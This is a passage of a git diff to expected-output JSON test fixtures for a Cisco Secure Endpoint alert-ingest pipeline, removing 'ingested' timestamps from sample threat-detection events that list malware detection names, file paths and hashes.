Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 
@@ -3232,7 +3195,6 @@ ], "code": "1090519054", "id": "6533667837389570000", - "ingested": "2022-02-02T05:52:33.422907434Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -3318,7 +3280,6 @@ ], "code": "1090519054", "id": "6176258066518901000", - "ingested": "2022-02-02T05:52:33.422908253Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 
@@ -3398,7 +3359,6 @@ ], "code": "1090519054", "id": "6176258014979293000", - "ingested": "2022-02-02T05:52:33.422909081Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 
@@ -3478,7 +3438,6 @@ ], "code": "1090519054", "id": "6176257963439686000", - "ingested": "2022-02-02T05:52:33.422909890Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 
@@ -3558,7 +3517,6 @@ ], "code": "1090519054", "id": "6533667579691532000", - "ingested": "2022-02-02T05:52:33.422910706Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -3648,7 +3606,6 @@ ], "code": "1090519054", "id": "6533667579691532000", - "ingested": "2022-02-02T05:52:33.422911517Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -3734,7 +3691,6 @@ ], "code": "1090519054", "id": "6533667579691532000", - "ingested": "2022-02-02T05:52:33.422912323Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -3824,7 +3780,6 @@ ], "code": "1090519054", "id": "6533667575396565000", - "ingested": "2022-02-02T05:52:33.422913153Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json index 4691e88d183..4230d2b11ae 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json 
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json @@ -44,7 +44,6 @@ ], "code": "553648147", "id": "6508397899087348000", - "ingested": "2022-02-02T05:52:43.212711526Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "severity": 3 
@@ -130,7 +129,6 @@ ], "code": "1107296272", "id": "14930696955218", - "ingested": "2022-02-02T05:52:43.212714468Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "severity": 3, 
@@ -212,7 +210,6 @@ ], "code": "2164260880", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212715451Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "severity": 2 
@@ -288,7 +285,6 @@ ], "code": "2164260880", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212716286Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "severity": 2 
@@ -366,7 +362,6 @@ ], "code": "1090519054", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212717142Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}", "severity": 2 
@@ -461,7 +456,6 @@ ], "code": "1090519054", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212718003Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "severity": 2 
@@ -555,7 +549,6 @@ ], "code": "1090519054", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212718818Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "severity": 2 
